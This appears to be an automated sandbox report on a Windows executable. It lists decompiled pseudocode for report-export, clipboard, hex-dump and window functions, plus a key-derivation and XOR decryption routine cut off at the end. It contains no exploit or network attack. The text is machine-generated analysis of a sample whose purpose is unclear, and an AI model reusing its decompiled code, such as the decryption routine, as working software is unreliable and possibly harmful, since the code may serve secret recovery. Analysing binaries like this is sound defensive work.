						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405EFD(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405EFD(_a4, 0x412b1c);
			}

0x00409369
0x00409373
0x0040937c
0x0040937c
0x0040937e
0x00409388
0x00409389
0x0040938a
0x0040938b
0x0040938c
0x00409396
0x00409397
0x0040939c
0x004093a3
0x004093a9
0x004093ac
0x004093b2
0x004093bd
0x004093c0
0x004093c2
0x004093c2
0x004093c5
0x004093c8
0x004093cc
0x004093d0
0x004093d4
0x004093de
0x004093e7
0x004093f1
0x00409407
0x00409417
0x0040941a
0x0040941d
0x00409421
0x0040942e
0x00409434
0x0040943e
0x00409450
0x0040945b
0x00409460
0x00409463
0x00409464
0x004093a9
0x0040947f

APIs

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mt,00000000,?,?,004092ED,00000001,00412B1C,74E04DE0), ref: 00405F17

strcat.MSVCRT(?, ), ref: 0040942E
sprintf.MSVCRT ref: 00409450

Strings

 , xrefs: 00409428
<td bgcolor=#%s nowrap>%s, xrefs: 00409374
<td bgcolor=#%s>%s, xrefs: 00409380
<tr>, xrefs: 0040938E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileWritesprintfstrcatstrlen
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 3813295786-4153097237
Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}

0x00410a8a
0x00410a92
0x00410a9d
0x00410aa2
0x00410aa2
0x00410aa5
0x00410aa6
0x00410aad
0x00410ab8
0x00410abd
0x00410abf
0x00410ac5
0x00410acb
0x00410ad6
0x00410ae0
0x00410aeb
0x00410af0
0x00410af9
0x00410aff
0x00410b08
0x00410b0b
0x00410b1c
0x00410b26
0x00410b31
0x00410b34
0x00410b3a
0x00410b3d
0x00410b4d
0x00410b55
0x00410b69
0x00410b71
0x00410b75
0x00410b7b
0x00410b7b
0x00410b88
0x00410b88
0x00410b4d
0x00410b90
0x00410b9d
0x00410baa
0x00410baa
0x00410b9d
0x00410bac
0x00410baf
0x00410bc4

APIs

wcslen.MSVCRT ref: 00410A9D
??2@YAPAXI@Z.MSVCRT ref: 00410AA6
WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF

Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0

strlen.MSVCRT ref: 00410B02

Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90

memcpy.MSVCRT ref: 00410B1C
??3@YAXPAX@Z.MSVCRT ref: 00410BAF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
String ID:
API String ID: 577244452-0
Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB54, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E004078FF(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E004078FF(0x1f6);
				_v60 = _t59;
				_v56 = E004078FF(0x1f7);
				_v52 = _t59;
				_t32 = E004078FF(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E004078FF(0x1f9);
				_v36 = _t60;
				_v32 = E004078FF(0x1fa);
				_v28 = "*.xml";
				_t35 = E004078FF(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E004078FF(0x1fc);
				_v12 = _t61;
				E0040684D( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E004078FF(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}

0x0040ab6d
0x0040ab74
0x0040ab81
0x0040ab88
0x0040ab8d
0x0040ab93
0x0040ab96
0x0040aba3
0x0040aba6
0x0040abaf
0x0040abb2
0x0040abb5
0x0040abba
0x0040abc4
0x0040abc7
0x0040abd0
0x0040abd3
0x0040abe0
0x0040abe3
0x0040abea
0x0040abef
0x0040abf5
0x0040abf8
0x0040ac00
0x0040ac0f
0x0040ac12
0x0040ac1b
0x0040ac1c
0x0040ac24
0x0040ac44

APIs

memset.MSVCRT ref: 0040AB74

Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07

Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74E04DE0), ref: 0040797A
Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998

Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9

Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6

Strings

*.xml, xrefs: 0040ABE3
txt, xrefs: 0040AC24, 0040AC27
*.txt, xrefs: 0040AB8D
*.csv, xrefs: 0040ABEF
*.htm;*.html, xrefs: 0040ABBA

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 4021364944-3614832568
Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}

0x00406491
0x004064a8
0x004064ad
0x004064b9
0x004064bc
0x004064c9
0x004064e1
0x004064f5
0x00406511

APIs

GetDC.USER32(00000000), ref: 0040649C
GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
ReleaseDC.USER32 ref: 004064BC
GetWindowRect.USER32 ref: 004064C9
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CapsDeviceWindow$MoveRectRelease
String ID:
API String ID: 3197862061-0
Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56
filestringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x00403a95
0x00403aab
0x00403ab2
0x00403ac5
0x00403acb
0x00403ae2
0x00403b01
0x00403b2d

APIs

memset.MSVCRT ref: 00403AB2
memset.MSVCRT ref: 00403ACB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
strlen.MSVCRT ref: 00403B13
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWidememset$FileWritestrlen
String ID:
API String ID: 1786725549-0
Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}

0x0040ac8a
0x0040ac95
0x0040aca4
0x0040acaa
0x0040acac
0x0040acb6
0x0040acb6
0x0040acd1
0x0040acd8
0x0040ace9
0x0040acf0
0x0040acf8
0x0040acfe
0x0040ad00
0x0040ad11
0x0040ad02
0x0040ad09
0x0040ad0e
0x0040ad19
0x0040ad21
0x0040ad26
0x00000000
0x0040ad2e
0x0040ad37

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
OpenClipboard.USER32(?), ref: 0040ACF8
GetLastError.KERNEL32 ref: 0040AD11
DeleteFileA.KERNEL32(00000000), ref: 0040AD2E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
String ID:
API String ID: 2014771361-0
Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00406585
0x0040659d
0x004065a4
0x004065a9
0x004065ac
0x004065af
0x004065b1
0x004065b8
0x004065c5
0x004065ca
0x004065cf
0x004065d7
0x004065dd
0x004065e2
0x004065e6
0x004065ec
0x004065f4
0x004065fa
0x004065ec
0x00406603
0x00406608
0x00406610
0x00406617

APIs

memset.MSVCRT ref: 004065A4
sprintf.MSVCRT ref: 004065C5
strcat.MSVCRT(?,00413078), ref: 004065D7
strcat.MSVCRT(?,00413084,00000000), ref: 004065F4
strcat.MSVCRT(?,00000000), ref: 00406603

Strings

%2.2X, xrefs: 004065BF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcat$memsetsprintf
String ID: %2.2X
API String ID: 582077193-791839006
Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}

0x0040feed
0x0040feed
0x0040fef2
0x0040fef8
0x0040fefa
0x0040fefb
0x0040ff00
0x0040ff04
0x0040ff06
0x0040ff0e
0x0040ff10
0x0040ff15
0x0040ff16
0x0040ff1b
0x0040ff1c
0x0040ff24
0x0040ff26
0x0040ff2b
0x0040ff2c
0x0040ff31
0x0040ff32
0x0040ff3a
0x0040ff3c
0x0040ff41
0x0040ff42
0x0040ff47
0x0040ff48
0x0040ff50
0x0040ff52
0x0040ff57
0x0040ff58
0x0040ff5d
0x0040ff5e
0x0040ff66
0x0040ff68
0x0040ff6d
0x0040ff6e
0x0040ff73
0x0040ff75

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040FEFB
??3@YAXPAX@Z.MSVCRT ref: 0040FF16
??3@YAXPAX@Z.MSVCRT ref: 0040FF2C
??3@YAXPAX@Z.MSVCRT ref: 0040FF42
??3@YAXPAX@Z.MSVCRT ref: 0040FF58
??3@YAXPAX@Z.MSVCRT ref: 0040FF6E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040173B, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040173B(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x0040174a
0x00401761
0x0040176b
0x00401773
0x00401774
0x00401778
0x0040177d
0x0040178d
0x004017a3

APIs

GetClientRect.USER32 ref: 0040174A
GetSystemMetrics.USER32 ref: 00401758
GetSystemMetrics.USER32 ref: 00401764
BeginPaint.USER32(?,?), ref: 0040177E
DrawFrameControl.USER32 ref: 0040178D
EndPaint.USER32(?,?), ref: 0040179A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411366, Relevance: 8.9, APIs: 7, Instructions: 147
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00410E8A(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BC49( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BC6D(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BD0B(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BC49( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BC6D(_t27, _t127,  &_v1172);
						E0040BD0B(_t121, _t127,  &_v24);
						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053D6(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}

0x00411366
0x00411372
0x00411381
0x00411387
0x0041139a
0x004113a0
0x004113ae
0x004113b4
0x004113cd
0x004113da
0x004113dc
0x004113e2
0x004113e4
0x004113f5
0x0041140b
0x00411413
0x0041141f
0x00411425
0x00411431
0x00411434
0x00411439
0x0041144b
0x00411452
0x0041145e
0x00411463
0x0041146c
0x00411488
0x0041148d
0x0041149a
0x0041149f
0x004114a5
0x004114aa
0x004114ac
0x004114af
0x004114ba
0x004114ba
0x004114bd
0x004114c5
0x004114c8
0x004114cb
0x004114ce
0x004114d8
0x004114dd
0x004114e1
0x004114e4
0x004114e4
0x004114e7
0x004114e7
0x004114ea
0x004114ea
0x004114ed
0x004114f4
0x004114f9
0x004114fb
0x004114fb
0x004114fb
0x00411500
0x00411502
0x0041150b
0x0041150d
0x0041150f
0x00411512
0x00411514
0x00411515
0x00411515
0x0041150f
0x0041151b
0x00411524
0x00411526
0x00411526
0x004113e4
0x0041152e

APIs

memset.MSVCRT ref: 00411387
memset.MSVCRT ref: 004113A0
memset.MSVCRT ref: 004113B4

Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97

strlen.MSVCRT ref: 004113D0
memcpy.MSVCRT ref: 004113F5
memcpy.MSVCRT ref: 0041140B

Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE

Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
